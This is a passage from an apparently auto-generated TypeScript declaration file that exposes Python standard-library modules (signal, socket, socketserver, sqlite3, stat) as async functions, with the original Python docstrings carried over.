Promise<any>\n\t\thelp_strip(): Promise<any>\n\t\thelp_strip$($: {}): Promise<any>\n\t\thelp_help(): Promise<any>\n\t\thelp_help$($: {}): Promise<any>\n\t\tpostcmd(stop, line): Promise<any>\n\t\tpostcmd$({ stop, line }): Promise<any>\n\t}\n\tlet initprofile: Promise<any>\n\tlet browser: Promise<any>\n}\ndeclare module signal {\n\tvar _\n\tfunction signal(signalnum, handler): Promise<any>\n\tfunction signal$({ signalnum, handler }): Promise<any>\n\tfunction getsignal(signalnum): Promise<any>\n\tfunction getsignal$({ signalnum }): Promise<any>\n\tfunction pthread_sigmask(how, mask): Promise<any>\n\tfunction pthread_sigmask$({ how, mask }): Promise<any>\n\tfunction sigpending(): Promise<any>\n\tfunction sigpending$($: {}): Promise<any>\n\tfunction sigwait(sigset): Promise<any>\n\tfunction sigwait$({ sigset }): Promise<any>\n\tfunction valid_signals(): Promise<any>\n\tfunction valid_signals$($: {}): Promise<any>\n}\ndeclare module socket {\n\tvar _\n\n\t/**\n\t * fromfd(fd, family, type[, proto]) -> socket object\n\t * \n\t * Create a socket object from a duplicate of the given file\n\t * descriptor. The remaining arguments are the same as for socket().\n\t * \n\t */\n\tfunction fromfd(fd, family, type, proto?): Promise<any>\n\tfunction fromfd$({ fd, family, type, proto }: { fd, family, type, proto?}): Promise<any>\n\n\t/**\n\t * send_fds(sock, buffers, fds[, flags[, address]]) -> integer\n\t * \n\t * Send the list of file descriptors fds over an AF_UNIX socket.\n\t * \n\t */\n\tfunction send_fds(sock, buffers, fds, flags?, address?): Promise<any>\n\tfunction send_fds$({ sock, buffers, fds, flags, address }: { sock, buffers, fds, flags?, address?}): Promise<any>\n\n\t/**\n\t * recv_fds(sock, bufsize, maxfds[, flags]) -> (data, list of file\n\t * descriptors, msg_flags, address)\n\t * \n\t * Receive up to maxfds file descriptors returning the message\n\t * data and a list containing the descriptors.\n\t * \n\t */\n\tfunction recv_fds(sock, bufsize, maxfds, flags?): Promise<any>\n\tfunction recv_fds$({ sock, bufsize, maxfds, flags }: { sock, bufsize, maxfds, flags?}): Promise<any>\n\n\t/**\n\t * fromshare(info) -> socket object\n\t * \n\t * Create a socket object from the bytes object returned by\n\t * socket.share(pid).\n\t * \n\t */\n\tfunction fromshare(info): Promise<any>\n\tfunction fromshare$({ info }): Promise<any>\n\n\t/**\n\t * socketpair([family[, type[, proto]]]) -> (socket object, socket object)\n\t * \n\t * Create a pair of socket objects from the sockets returned by the platform\n\t * socketpair() function.\n\t * The arguments are the same as for socket() except the default family is\n\t * AF_UNIX if defined on the platform; otherwise, the default is AF_INET.\n\t * \n\t */\n\tfunction socketpair(family?, type?, proto?): Promise<any>\n\tfunction socketpair$({ family, type, proto }: { family?, type?, proto?}): Promise<any>\n\tfunction socketpair(family?, type?, proto?): Promise<any>\n\tfunction socketpair$({ family, type, proto }: { family?, type?, proto?}): Promise<any>\n\n\t/**\n\t * Get fully qualified domain name from name.\n\t * \n\t * An empty argument is interpreted as meaning the local host.\n\t * \n\t * First the hostname returned by gethostbyaddr() is checked, then\n\t * possibly existing aliases. In case no FQDN is available, hostname\n\t * from gethostname() is returned.\n\t * \n\t */\n\tfunction getfqdn(name?): Promise<any>\n\tfunction getfqdn$({ name }: { name?}): Promise<any>\n\n\t/**\n\t * Connect to *address* and return the socket object.\n\t * \n\t * Convenience function. Connect to *address* (a 2-tuple ``(host,\n\t * port)``) and return the socket object. Passing the optional\n\t * *timeout* parameter will set the timeout on the socket instance\n\t * before attempting to connect. If no *timeout* is supplied, the\n\t * global default timeout setting returned by :func:`getdefaulttimeout`\n\t * is used. If *source_address* is set it must be a tuple of (host, port)\n\t * for the socket to bind as a source address before making the connection.\n\t * A host of '' or port 0 tells the OS to use the default.\n\t * \n\t */\n\tfunction create_connection(address, timeout?, source_address?): Promise<any>\n\tfunction create_connection$({ address, timeout, source_address }: { address, timeout?, source_address?}): Promise<any>\n\n\t/**\n\t * Return True if the platform supports creating a SOCK_STREAM socket\n\t * which can handle both AF_INET and AF_INET6 (IPv4 / IPv6) connections.\n\t * \n\t */\n\tfunction has_dualstack_ipv6(): Promise<any>\n\tfunction has_dualstack_ipv6$($: {}): Promise<any>\n\n\t/**\n\t * Convenience function which creates a SOCK_STREAM type socket\n\t * bound to *address* (a 2-tuple (host, port)) and return the socket\n\t * object.\n\t * \n\t * *family* should be either AF_INET or AF_INET6.\n\t * *backlog* is the queue size passed to socket.listen().\n\t * *reuse_port* dictates whether to use the SO_REUSEPORT socket option.\n\t * *dualstack_ipv6*: if true and the platform supports it, it will\n\t * create an AF_INET6 socket able to accept both IPv4 or IPv6\n\t * connections. When false it will explicitly disable this option on\n\t * platforms that enable it by default (e.g. Linux).\n\t * \n\t * >>> with create_server(('', 8000)) as server:\n\t * ... while True:\n\t * ... conn, addr = server.accept()\n\t * ... # handle new connection\n\t * \n\t */\n\tfunction create_server(address): Promise<any>\n\tfunction create_server$({ address }): Promise<any>\n\n\t/**\n\t * Resolve host and port into list of address info entries.\n\t * \n\t * Translate the host/port argument into a sequence of 5-tuples that contain\n\t * all the necessary arguments for creating a socket connected to that service.\n\t * host is a domain name, a string representation of an IPv4/v6 address or\n\t * None. port is a string service name such as 'http', a numeric port number or\n\t * None. By passing None as the value of host and port, you can pass NULL to\n\t * the underlying C API.\n\t * \n\t * The family, type and proto arguments can be optionally specified in order to\n\t * narrow the list of addresses returned. Passing zero as a value for each of\n\t * these arguments selects the full range of results.\n\t * \n\t */\n\tfunction getaddrinfo(host, port, family?, type?, proto?, flags?): Promise<any>\n\tfunction getaddrinfo$({ host, port, family, type, proto, flags }: { host, port, family?, type?, proto?, flags?}): Promise<any>\n\tinterface I_GiveupOnSendfile {\n\t}\n\n\t/**\n\t * A subclass of _socket.socket adding the makefile() method.\n\t */\n\tfunction socket(family?, type?, proto?, fileno?): Promise<Isocket>\n\tfunction socket$({ family, type, proto, fileno }: { family?, type?, proto?, fileno?}): Promise<Isocket>\n\tinterface Isocket {\n\n\t\t/**\n\t\t * dup() -> socket object\n\t\t * \n\t\t * Duplicate the socket. Return a new socket object connected to the same\n\t\t * system resource. The new socket is non-inheritable.\n\t\t * \n\t\t */\n\t\tdup(): Promise<any>\n\t\tdup$($: {}): Promise<any>\n\n\t\t/**\n\t\t * accept() -> (socket object, address info)\n\t\t * \n\t\t * Wait for an incoming connection. Return a new socket\n\t\t * representing the connection, and the address of the client.\n\t\t * For IP sockets, the address info is a pair (hostaddr, port).\n\t\t * \n\t\t */\n\t\taccept(): Promise<any>\n\t\taccept$($: {}): Promise<any>\n\n\t\t/**\n\t\t * makefile(...) -> an I/O stream connected to the socket\n\t\t * \n\t\t * The arguments are as for io.open() after the filename, except the only\n\t\t * supported mode values are 'r' (default), 'w' and 'b'.\n\t\t * \n\t\t */\n\t\tmakefile(mode?, buffering?): Promise<any>\n\t\tmakefile$({ mode, buffering }: { mode?, buffering?}): Promise<any>\n\n\t\t/**\n\t\t * sendfile(file[, offset[, count]]) -> sent\n\t\t * \n\t\t * Send a file until EOF is reached by using high-performance\n\t\t * os.sendfile() and return the total number of bytes which\n\t\t * were sent.\n\t\t * *file* must be a regular file object opened in binary mode.\n\t\t * If os.sendfile() is not available (e.g. Windows) or file is\n\t\t * not a regular file socket.send() will be used instead.\n\t\t * *offset* tells from where to start reading the file.\n\t\t * If specified, *count* is the total number of bytes to transmit\n\t\t * as opposed to sending the file until EOF is reached.\n\t\t * File position is updated on return or also in case of error in\n\t\t * which case file.tell() can be used to figure out the number of\n\t\t * bytes which were sent.\n\t\t * The socket must be of SOCK_STREAM type.\n\t\t * Non-blocking sockets are not supported.\n\t\t * \n\t\t */\n\t\tsendfile(file, offset?, count?): Promise<any>\n\t\tsendfile$({ file, offset, count }: { file, offset?, count?}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\n\t\t/**\n\t\t * detach() -> file descriptor\n\t\t * \n\t\t * Close the socket object without closing the underlying file descriptor.\n\t\t * The object cannot be used after this call, but the file descriptor\n\t\t * can be reused for other purposes. The file descriptor is returned.\n\t\t * \n\t\t */\n\t\tdetach(): Promise<any>\n\t\tdetach$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Read-only access to the address family for this socket.\n\t\t * \n\t\t */\n\t\tfamily(): Promise<any>\n\t\tfamily$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Read-only access to the socket type.\n\t\t * \n\t\t */\n\t\ttype(): Promise<any>\n\t\ttype$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Raw I/O implementation for stream sockets.\n\t * \n\t * This class supports the makefile() method on sockets. It provides\n\t * the raw I/O interface on top of a socket object.\n\t * \n\t */\n\tfunction SocketIO(sock, mode): Promise<ISocketIO>\n\tfunction SocketIO$({ sock, mode }): Promise<ISocketIO>\n\tinterface ISocketIO {\n\n\t\t/**\n\t\t * Read up to len(b) bytes into the writable buffer *b* and return\n\t\t * the number of bytes read. If the socket is non-blocking and no bytes\n\t\t * are available, None is returned.\n\t\t * \n\t\t * If *b* is non-empty, a 0 return value indicates that the connection\n\t\t * was shutdown at the other end.\n\t\t * \n\t\t */\n\t\treadinto(b): Promise<any>\n\t\treadinto$({ b }): Promise<any>\n\n\t\t/**\n\t\t * Write the given bytes or bytearray object *b* to the socket\n\t\t * and return the number of bytes written. This can be less than\n\t\t * len(b) if not all data could be written. If the socket is\n\t\t * non-blocking and no bytes could be written None is returned.\n\t\t * \n\t\t */\n\t\twrite(b): Promise<any>\n\t\twrite$({ b }): Promise<any>\n\n\t\t/**\n\t\t * True if the SocketIO is open for reading.\n\t\t * \n\t\t */\n\t\treadable(): Promise<any>\n\t\treadable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * True if the SocketIO is open for writing.\n\t\t * \n\t\t */\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * True if the SocketIO is open for seeking.\n\t\t * \n\t\t */\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the file descriptor of the underlying socket.\n\t\t * \n\t\t */\n\t\tfileno(): Promise<any>\n\t\tfileno$($: {}): Promise<any>\n\t\tname(): Promise<any>\n\t\tname$($: {}): Promise<any>\n\t\tmode(): Promise<any>\n\t\tmode$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Close the SocketIO object. This doesn't close the underlying\n\t\t * socket, except if all references to it have disappeared.\n\t\t * \n\t\t */\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\tlet EBADF: Promise<any>\n\tlet EAGAIN: Promise<any>\n\tlet EWOULDBLOCK: Promise<any>\n\tlet errorTab: Promise<any>\n}\ndeclare module socketserver {\n\tvar _\n\n\t/**\n\t * Base class for server classes.\n\t * \n\t * Methods for the caller:\n\t * \n\t * - __init__(server_address, RequestHandlerClass)\n\t * - serve_forever(poll_interval=0.5)\n\t * - shutdown()\n\t * - handle_request() # if you do not use serve_forever()\n\t * - fileno() -> int # for selector\n\t * \n\t * Methods that may be overridden:\n\t * \n\t * - server_bind()\n\t * - server_activate()\n\t * - get_request() -> request, client_address\n\t * - handle_timeout()\n\t * - verify_request(request, client_address)\n\t * - server_close()\n\t * - process_request(request, client_address)\n\t * - shutdown_request(request)\n\t * - close_request(request)\n\t * - service_actions()\n\t * - handle_error()\n\t * \n\t * Methods for derived classes:\n\t * \n\t * - finish_request(request, client_address)\n\t * \n\t * Class variables that may be overridden by derived classes or\n\t * instances:\n\t * \n\t * - timeout\n\t * - address_family\n\t * - socket_type\n\t * - allow_reuse_address\n\t * \n\t * Instance variables:\n\t * \n\t * - RequestHandlerClass\n\t * - socket\n\t * \n\t * \n\t */\n\n\t/**\n\t * Constructor. May be extended, do not override.\n\t */\n\tfunction BaseServer(server_address, RequestHandlerClass): Promise<IBaseServer>\n\tfunction BaseServer$({ server_address, RequestHandlerClass }): Promise<IBaseServer>\n\tinterface IBaseServer {\n\n\t\t/**\n\t\t * Called by constructor to activate the server.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_activate(): Promise<any>\n\t\tserver_activate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Handle one request at a time until shutdown.\n\t\t * \n\t\t * Polls for shutdown every poll_interval seconds. Ignores\n\t\t * self.timeout. If you need to do periodic tasks, do them in\n\t\t * another thread.\n\t\t * \n\t\t */\n\t\tserve_forever(poll_interval?): Promise<any>\n\t\tserve_forever$({ poll_interval }: { poll_interval?}): Promise<any>\n\n\t\t/**\n\t\t * Stops the serve_forever loop.\n\t\t * \n\t\t * Blocks until the loop has finished. This must be called while\n\t\t * serve_forever() is running in another thread, or it will\n\t\t * deadlock.\n\t\t * \n\t\t */\n\t\tshutdown(): Promise<any>\n\t\tshutdown$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called by the serve_forever() loop.\n\t\t * \n\t\t * May be overridden by a subclass / Mixin to implement any code that\n\t\t * needs to be run during the loop.\n\t\t * \n\t\t */\n\t\tservice_actions(): Promise<any>\n\t\tservice_actions$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Handle one request, possibly blocking.\n\t\t * \n\t\t * Respects self.timeout.\n\t\t * \n\t\t */\n\t\thandle_request(): Promise<any>\n\t\thandle_request$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called if no new request arrives within self.timeout.\n\t\t * \n\t\t * Overridden by ForkingMixIn.\n\t\t * \n\t\t */\n\t\thandle_timeout(): Promise<any>\n\t\thandle_timeout$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Verify the request. May be overridden.\n\t\t * \n\t\t * Return True if we should proceed with this request.\n\t\t * \n\t\t * \n\t\t */\n\t\tverify_request(request, client_address): Promise<any>\n\t\tverify_request$({ request, client_address }): Promise<any>\n\n\t\t/**\n\t\t * Call finish_request.\n\t\t * \n\t\t * Overridden by ForkingMixIn and ThreadingMixIn.\n\t\t * \n\t\t * \n\t\t */\n\t\tprocess_request(request, client_address): Promise<any>\n\t\tprocess_request$({ request, client_address }): Promise<any>\n\n\t\t/**\n\t\t * Called to clean-up the server.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_close(): Promise<any>\n\t\tserver_close$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Finish one request by instantiating RequestHandlerClass.\n\t\t */\n\t\tfinish_request(request, client_address): Promise<any>\n\t\tfinish_request$({ request, client_address }): Promise<any>\n\n\t\t/**\n\t\t * Called to shutdown and close an individual request.\n\t\t */\n\t\tshutdown_request(request): Promise<any>\n\t\tshutdown_request$({ request }): Promise<any>\n\n\t\t/**\n\t\t * Called to clean up an individual request.\n\t\t */\n\t\tclose_request(request): Promise<any>\n\t\tclose_request$({ request }): Promise<any>\n\n\t\t/**\n\t\t * Handle an error gracefully. May be overridden.\n\t\t * \n\t\t * The default is to print a traceback and continue.\n\t\t * \n\t\t * \n\t\t */\n\t\thandle_error(request, client_address): Promise<any>\n\t\thandle_error$({ request, client_address }): Promise<any>\n\t\ttimeout\n\t}\n\n\t/**\n\t * Base class for various socket-based server classes.\n\t * \n\t * Defaults to synchronous IP stream (i.e., TCP).\n\t * \n\t * Methods for the caller:\n\t * \n\t * - __init__(server_address, RequestHandlerClass, bind_and_activate=True)\n\t * - serve_forever(poll_interval=0.5)\n\t * - shutdown()\n\t * - handle_request() # if you don't use serve_forever()\n\t * - fileno() -> int # for selector\n\t * \n\t * Methods that may be overridden:\n\t * \n\t * - server_bind()\n\t * - server_activate()\n\t * - get_request() -> request, client_address\n\t * - handle_timeout()\n\t * - verify_request(request, client_address)\n\t * - process_request(request, client_address)\n\t * - shutdown_request(request)\n\t * - close_request(request)\n\t * - handle_error()\n\t * \n\t * Methods for derived classes:\n\t * \n\t * - finish_request(request, client_address)\n\t * \n\t * Class variables that may be overridden by derived classes or\n\t * instances:\n\t * \n\t * - timeout\n\t * - address_family\n\t * - socket_type\n\t * - request_queue_size (only for stream sockets)\n\t * - allow_reuse_address\n\t * \n\t * Instance variables:\n\t * \n\t * - server_address\n\t * - RequestHandlerClass\n\t * - socket\n\t * \n\t * \n\t */\n\n\t/**\n\t * Constructor. May be extended, do not override.\n\t */\n\tfunction TCPServer(server_address, RequestHandlerClass, bind_and_activate?: boolean): Promise<ITCPServer>\n\tfunction TCPServer$({ server_address, RequestHandlerClass, bind_and_activate }: { server_address, RequestHandlerClass, bind_and_activate?}): Promise<ITCPServer>\n\tinterface ITCPServer extends IBaseServer {\n\n\t\t/**\n\t\t * Called by constructor to bind the socket.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_bind(): Promise<any>\n\t\tserver_bind$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called by constructor to activate the server.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_activate(): Promise<any>\n\t\tserver_activate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called to clean-up the server.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tserver_close(): Promise<any>\n\t\tserver_close$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return socket file number.\n\t\t * \n\t\t * Interface required by selector.\n\t\t * \n\t\t * \n\t\t */\n\t\tfileno(): Promise<any>\n\t\tfileno$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Get the request and client address from the socket.\n\t\t * \n\t\t * May be overridden.\n\t\t * \n\t\t * \n\t\t */\n\t\tget_request(): Promise<any>\n\t\tget_request$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Called to shutdown and close an individual request.\n\t\t */\n\t\tshutdown_request(request): Promise<any>\n\t\tshutdown_request$({ request }): Promise<any>\n\n\t\t/**\n\t\t * Called to clean up an individual request.\n\t\t */\n\t\tclose_request(request): Promise<any>\n\t\tclose_request$({ request }): Promise<any>\n\t\taddress_family\n\t\tsocket_type\n\t\trequest_queue_size\n\t\tallow_reuse_address\n\t}\n\n\t/**\n\t * UDP server class.\n\t */\n\tinterface IUDPServer extends ITCPServer {\n\t\tget_request(): Promise<any>\n\t\tget_request$($: {}): Promise<any>\n\t\tserver_activate(): Promise<any>\n\t\tserver_activate$($: {}): Promise<any>\n\t\tshutdown_request(request): Promise<any>\n\t\tshutdown_request$({ request }): Promise<any>\n\t\tclose_request(request): Promise<any>\n\t\tclose_request$({ request }): Promise<any>\n\t\tmax_packet_size\n\t}\n\n\t/**\n\t * Mix-in class to handle each request in a new process.\n\t */\n\tinterface IForkingMixIn {\n\n\t\t/**\n\t\t * Internal routine to wait for children that have exited.\n\t\t */\n\t\tcollect_children(): Promise<any>\n\t\tcollect_children$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Wait for zombies after self.timeout seconds of inactivity.\n\t\t * \n\t\t * May be extended, do not override.\n\t\t * \n\t\t */\n\t\thandle_timeout(): Promise<any>\n\t\thandle_timeout$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Collect the zombie child processes regularly in the ForkingMixIn.\n\t\t * \n\t\t * service_actions is called in the BaseServer's serve_forever loop.\n\t\t * \n\t\t */\n\t\tservice_actions(): Promise<any>\n\t\tservice_actions$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Fork a new subprocess to process the request.\n\t\t */\n\t\tprocess_request(request, client_address): Promise<any>\n\t\tprocess_request$({ request, client_address }): Promise<any>\n\t\tserver_close(): Promise<any>\n\t\tserver_close$($: {}): Promise<any>\n\t\tactive_children\n\t\tmax_children\n\t\tblock_on_close\n\t}\n\n\t/**\n\t * \n\t * Joinable list of all non-daemon threads.\n\t * \n\t */\n\tinterface I_Threads {\n\t\tappend(thread): Promise<any>\n\t\tappend$({ thread }): Promise<any>\n\t\tpop_all(): Promise<any>\n\t\tpop_all$($: {}): Promise<any>\n\t\tjoin(): Promise<any>\n\t\tjoin$($: {}): Promise<any>\n\t\treap(): Promise<any>\n\t\treap$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * Degenerate version of _Threads.\n\t * \n\t */\n\tinterface I_NoThreads {\n\t\tappend(thread): Promise<any>\n\t\tappend$({ thread }): Promise<any>\n\t\tjoin(): Promise<any>\n\t\tjoin$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Mix-in class to handle each request in a new thread.\n\t */\n\tinterface IThreadingMixIn {\n\n\t\t/**\n\t\t * Same as in BaseServer but as a thread.\n\t\t * \n\t\t * In addition, exception handling is done here.\n\t\t * \n\t\t * \n\t\t */\n\t\tprocess_request_thread(request, client_address): Promise<any>\n\t\tprocess_request_thread$({ request, client_address }): Promise<any>\n\n\t\t/**\n\t\t * Start a new thread to process the request.\n\t\t */\n\t\tprocess_request(request, client_address): Promise<any>\n\t\tprocess_request$({ request, client_address }): Promise<any>\n\t\tserver_close(): Promise<any>\n\t\tserver_close$($: {}): Promise<any>\n\t\tdaemon_threads\n\t}\n\tinterface IForkingUDPServer extends IForkingMixIn, IUDPServer {\n\t}\n\tinterface IForkingTCPServer extends IForkingMixIn, ITCPServer {\n\t}\n\tinterface IThreadingUDPServer extends IThreadingMixIn, IUDPServer {\n\t}\n\tinterface IThreadingTCPServer extends IThreadingMixIn, ITCPServer {\n\t}\n\tinterface IUnixStreamServer extends ITCPServer {\n\t}\n\tinterface IUnixDatagramServer extends IUDPServer {\n\t}\n\tinterface IThreadingUnixStreamServer extends IThreadingMixIn, IUnixStreamServer {\n\t}\n\tinterface IThreadingUnixDatagramServer extends IThreadingMixIn, IUnixDatagramServer {\n\t}\n\n\t/**\n\t * Base class for request handler classes.\n\t * \n\t * This class is instantiated for each request to be handled. The\n\t * constructor sets the instance variables request, client_address\n\t * and server, and then calls the handle() method. To implement a\n\t * specific service, all you need to do is to derive a class which\n\t * defines a handle() method.\n\t * \n\t * The handle() method can find the request as self.request, the\n\t * client address as self.client_address, and the server (in case it\n\t * needs access to per-server information) as self.server. Since a\n\t * separate instance is created for each request, the handle() method\n\t * can define other arbitrary instance variables.\n\t * \n\t * \n\t */\n\tfunction BaseRequestHandler(request, client_address, server): Promise<IBaseRequestHandler>\n\tfunction BaseRequestHandler$({ request, client_address, server }): Promise<IBaseRequestHandler>\n\tinterface IBaseRequestHandler {\n\t\tsetup(): Promise<any>\n\t\tsetup$($: {}): Promise<any>\n\t\thandle(): Promise<any>\n\t\thandle$($: {}): Promise<any>\n\t\tfinish(): Promise<any>\n\t\tfinish$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Define self.rfile and self.wfile for stream sockets.\n\t */\n\tinterface IStreamRequestHandler extends IBaseRequestHandler {\n\t\tsetup(): Promise<any>\n\t\tsetup$($: {}): Promise<any>\n\t\tfinish(): Promise<any>\n\t\tfinish$($: {}): Promise<any>\n\t\trbufsize\n\t\twbufsize\n\t\tdisable_nagle_algorithm\n\t}\n\n\t/**\n\t * Simple writable BufferedIOBase implementation for a socket\n\t * \n\t * Does not hold data in a buffer, avoiding any need to call flush().\n\t */\n\tinterface I_SocketWriter {\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\t\twrite(b): Promise<any>\n\t\twrite$({ b }): Promise<any>\n\t\tfileno(): Promise<any>\n\t\tfileno$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Define self.rfile and self.wfile for datagram sockets.\n\t */\n\tinterface IDatagramRequestHandler extends IBaseRequestHandler {\n\t\tsetup(): Promise<any>\n\t\tsetup$($: {}): Promise<any>\n\t\tfinish(): Promise<any>\n\t\tfinish$($: {}): Promise<any>\n\t}\n}\ndeclare module sqlite3 {\n\tvar _\n\tmodule dbapi2 {\n\t\tvar _\n\t\tfunction DateFromTicks(ticks): Promise<any>\n\t\tfunction DateFromTicks$({ ticks }): Promise<any>\n\t\tfunction TimeFromTicks(ticks): Promise<any>\n\t\tfunction TimeFromTicks$({ ticks }): Promise<any>\n\t\tfunction TimestampFromTicks(ticks): Promise<any>\n\t\tfunction TimestampFromTicks$({ ticks }): Promise<any>\n\t\tfunction register_adapters_and_converters(): Promise<any>\n\t\tfunction register_adapters_and_converters$($: {}): Promise<any>\n\t\tfunction enable_shared_cache(enable): Promise<any>\n\t\tfunction enable_shared_cache$({ enable }): Promise<any>\n\t\tlet paramstyle: Promise<any>\n\t\tlet threadsafety: Promise<any>\n\t\tlet apilevel: Promise<any>\n\t\tlet Date: Promise<any>\n\t\tlet Time: Promise<any>\n\t\tlet Timestamp: Promise<any>\n\t\tlet version_info: Promise<any>\n\t\tlet sqlite_version_info: Promise<any>\n\t\tlet Binary: Promise<any>\n\t}\n\tmodule dump {\n\t\tvar _\n\t}\n}\ndeclare module stat {\n\tvar _\n\n\t/**\n\t * Return the portion of the file's mode that can be set by\n\t * os.chmod().\n\t * \n\t */\n\tfunction S_IMODE(mode): Promise<any>\n\tfunction S_IMODE$({ mode }): Promise<any>\n\n\t/**\n\t * Return the portion of the file's mode that describes the\n\t * file type.\n\t * \n\t */\n\tfunction S_IFMT(mode): Promise<any>\n\tfunction S_IFMT$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a directory.\n\t */\n\tfunction S_ISDIR(mode): Promise<any>\n\tfunction S_ISDIR$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a character special device file.\n\t */\n\tfunction S_ISCHR(mode): Promise<any>\n\tfunction S_ISCHR$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a block special device file.\n\t */\n\tfunction S_ISBLK(mode): Promise<any>\n\tfunction S_ISBLK$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a regular file.\n\t */\n\tfunction S_ISREG(mode): Promise<any>\n\tfunction S_ISREG$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a FIFO (named pipe).\n\t */\n\tfunction S_ISFIFO(mode): Promise<any>\n\tfunction S_ISFIFO$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a symbolic link.\n\t */\n\tfunction S_ISLNK(mode): Promise<any>\n\tfunction S_ISLNK$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a socket.\n\t */\n\tfunction S_ISSOCK(mode): Promise<any>\n\tfunction S_ISSOCK$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a door.\n\t */\n\tfunction S_ISDOOR(mode): Promise<any>\n\tfunction S_ISDOOR$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from an event port.\n\t */\n\tfunction S_ISPORT(mode): Promise<any>\n\tfunction S_ISPORT$({ mode }): Promise<any>\n\n\t/**\n\t * Return True if mode is from a whiteout.\n\t */\n\tfunction S_ISWHT(mode): Promise<any>\n\tfunction S_ISWHT$({ mode }): Promise<any>\n\n\t/**\n\t * Convert a file's mode to a string of the form '-rwxrwxrwx'.\n\t */\n\tfunction filemode(mode): Promise<any>\n\tfunction filemode$({ mode }): Promise<any>\n\tlet ST_MODE: Promise<any>\n\tlet ST_INO: Promise<any>\n\tlet ST_DEV: Promise<any>\n\tlet ST_NLINK: Promise<any>\n\tlet ST_UID: Promise<any>\n\tlet ST_GID: Promise<any>\n\tlet ST_SIZE: Promise<any>\n\tlet ST_ATIME: Promise<any>\n\tlet ST_MTIME: Promise<any>\n\tlet ST_CTIME: Promise<any>\n\tlet S_IFDIR: Promise<any>\n\tlet S_IFCHR: Promise<any>\n\tlet S_IFBLK: Promise<any>\n\tlet S_IFREG: Promise<any>\n\tlet S_IFIFO: Promise<any>\n\tlet S_IFLNK: Promise<any>\n\tlet S_IFSOCK: Promise<any>\n\tlet S_IFDOOR: Promise<any>\n\tlet S_IFPORT: Promise<any>\n\tlet S_IFWHT: Promise<any>\n\tlet S_ISUID: Promise<any>\n\tlet S_ISGID: Promise<any>\n\tlet S_ENFMT: Promise<any>\n\tlet S_ISVTX: Promise<any>\n\tlet S_IREAD: Promise<any>\n\tlet S_IWRITE: Promise<any>\n\tlet S_IEXEC: Promise<any>\n\tlet S_IRWXU: Promise<any>\n\tlet S_IRUSR: Promise<any>\n\tlet S_IWUSR: Promise<any>\n\tlet S_IXUSR: Promise<any>\n\tlet S_IRWXG: Promise<any>\n\tlet S_IRGRP: Promise<any>\n\tlet S_IWGRP: Promise<any>\n\tlet S_IXGRP: Promise<any>\n\tlet S_IRWXO: Promise<any>\n\tlet S_IROTH: Promise<any>\n\tlet S_IWOTH: Promise<any>\n\tlet S_IXOTH: Promise<any>\n\tlet UF_NODUMP: Promise<any>\n\tlet UF_IMMUTABLE: Promise<any>\n\tlet UF_APPEND: Promise<any>\n\tlet UF_OPAQUE: Promise<any>\n\tlet UF_NOUNLINK: Promise<any>\n\tlet UF_COMPRESSED: Promise<any>\n\tlet UF_HIDDEN: Promise<any>\n\tlet SF_ARCHIVED: Promise<any>\n\tlet SF_IMMUTABLE: Promise<any>\n\tlet SF_APPEND: Promise<any>\n\tlet SF_NOUNLINK: Promise<any>\n\tlet SF_SNAPSHOT: Promise<any>\n\tlet FILE_ATTRIBUTE_ARCHIVE: Promise<any>\n\tlet FILE_ATTRIBUTE_COMPRESSED: Promise<any>\n\tlet FILE_ATTRIBUTE_DEVICE: Promise<any>\n\tlet FILE_ATTRIBUTE_DIRECTORY: Promise<any>\n\tlet FILE_ATTRIBUTE_ENCRYPTED: Promise<any>\n\tlet FILE_ATTRIBUTE_HIDDEN: Promise<any>\n\tlet FILE_ATTRIBUTE_INTEGRITY_STREAM: Promise<any>\n\tlet FILE_ATTRIBUTE_NORMAL: Promise<any>\n\tlet FILE_ATTRIBUTE_NOT_CONTENT_INDEXED: Promise<any>\n\tlet FILE_ATTRIBUTE_NO_SCRUB_DATA: Promise<any>\n\tlet FILE_ATTRIBUTE_OFFLINE: Promise<any>\n\tlet 